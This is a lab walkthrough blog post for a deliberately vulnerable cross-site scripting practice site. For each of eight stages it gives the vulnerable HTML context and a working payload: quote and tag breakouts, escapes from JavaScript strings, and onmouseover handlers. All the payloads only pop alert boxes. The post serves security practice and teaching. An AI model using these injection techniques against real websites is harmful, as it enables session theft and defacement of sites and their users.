leettime : Lab walkthrough for XSS

Lab Link : http://leettime.net/xsslab1/

       1.
        <script>alert(document.URL)</script>

       2.

       <input type="text" name="name" value=hello></input>

       <input type="text" name="name" value= 

       hello ></input> <script>alert(1)</script>

       ></input>

       Payload: ></input> <script>alert(1)</script>

       3.

       <input type="text" name="name" value="hello"></input>

       Payload: "></input><script>alert(document.URL)</script>

       4.

       <input type="text" name="name" value='ironman'></input>

       Payload: '></input><script>alert(document.URL)</script>

       5.

       <script>var search_str="kuku";</script>

       Payload: ;</script> <script>alert(document.URL)</script>

       6.

       <script>var search_str='ayush';</script>

       Payload: x = ';</script> <script>alert(document.URL)</script>

       7.

       <input type="text" name="name" value='hello'></input>

       Payload: '></input> <script>alert(document.URL)</script> 

       <input type="text" name="name" value=''</input <scriptalert(document.URL)</script'></input>

       Payload: Failed :(

       Payload: 'onmouseover='alert(1);

       8.

       <input type="text" name="name" value='hello'></input>

       Payload: '></input><script>alert(document.URL)</script>

       <input type="text" name="name" value='></input><script>alert(document.URL)</script>'></input>

       Payload: '></input>'onmouseover='alert(1);

       <input type="text" name="name" value='></input>onmouseover=alert(1);'></input>

       URL: http://leettime.net/xsslab1/stage--08.php?name=hello&submit=search

       <input type="submit" name="submit" value="search">

       Parameters: 
       name=hello
       submit=search

       URL: http://leettime.net/xsslab1/stage--08.php?name=hello&submit=search1

       <input type="submit" name="submit" value="search1">

       Payload: "onmouseover="alert(document.URL);

       http://leettime.net/xsslab1/stage--08.php?name=hello&submit=search%22onmouseover=%22alert(document.URL);

Author: Anmol K Sachan

Leave a Reply

Your email address will not be published. Required fields are marked *